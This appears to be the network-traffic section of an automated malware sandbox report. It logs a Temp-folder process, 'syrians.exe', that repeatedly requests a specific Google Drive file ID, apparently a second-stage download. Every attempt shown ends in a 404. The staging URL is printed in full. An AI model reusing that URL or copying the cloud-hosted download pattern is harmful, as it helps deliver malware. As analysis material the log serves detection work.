Jan 11, 2025 05:09:51.016536951 CET	1.1.1.1	192.168.2.6	0x8785	No error (0)	drive.usercontent.google.com		142.250.186.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	54044	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:50 UTC	216	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 04:09:50 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:50 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-smr_jC3w_Azgs8JFvk6mmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	54045	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:51 UTC	258	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 04:09:52 UTC	2230	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ1WfKLDAmmF4wbrnbD8UaVl1cv_ED6pXiEnKwFrloVCho9HxmBwpWdZsCAINMU0chXEntWHfg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:51 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-lIghmXnHWEOvIZNT4Hw-hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1; expires=Sun, 13-Jul-2025 04:09:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:09:52 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 67 46 77 62 65 69 42 30 39 64 5f 70 55 65 74 78 63 39 4b 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4gFwbeiB09d_pUetxc9Ktw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	54046	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:52 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:53 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:53 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-xEg3yQJzh0Q23R_DttrXnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	54047	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:53 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:54 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC63t_Dk2M1kWtQx8lwQ51IFeu1b26Xwddk299SDaIhf7rUlqHJJVDxaXNGkm8SJb4hn Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:54 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-C9iWnsURsvr2OPnGO8Zd0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:09:54 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 53 67 6c 79 58 53 4a 4f 42 59 76 4c 31 2d 72 52 4b 78 76 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YSglyXSJOBYvL1-rRKxvhQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	54048	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:55 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:55 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:55 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-wwC0nrHgkJNzoDoQKieoEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	54049	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:56 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:56 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRTq_IcLHyB4vsfmZ9QzCYKqU8BLkupkEJ3hYlbgEbVdL8uhzDSYjdnUCmM7N6jcBbzLFSUW8w Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:56 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-9fiIFkd1qNCWGE-gVBSdTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:09:56 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 56 2d 4d 72 66 74 43 5a 54 50 4a 61 4b 33 6f 70 66 73 79 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3V-MrftCZTPJaK3opfsy5w">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	54050	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:57 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:57 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:57 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-rLibnQFcf8pzpXm_Ub2miQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	54051	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:09:58 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:09:58 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT_63tt1kHZx4KY_rOs8EqmalHEO8KsUcujVyytHKD-zdlIuISwVHcrLfTmwQc8i9MCc_Ou8sM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:09:58 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-9nvP3GDLQMb03HkX5iBPZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:09:58 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 4b 73 4f 32 5a 78 55 6f 45 4c 58 62 63 4f 64 48 78 45 57 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7KsO2ZxUoELXbcOdHxEWow">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	54052	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
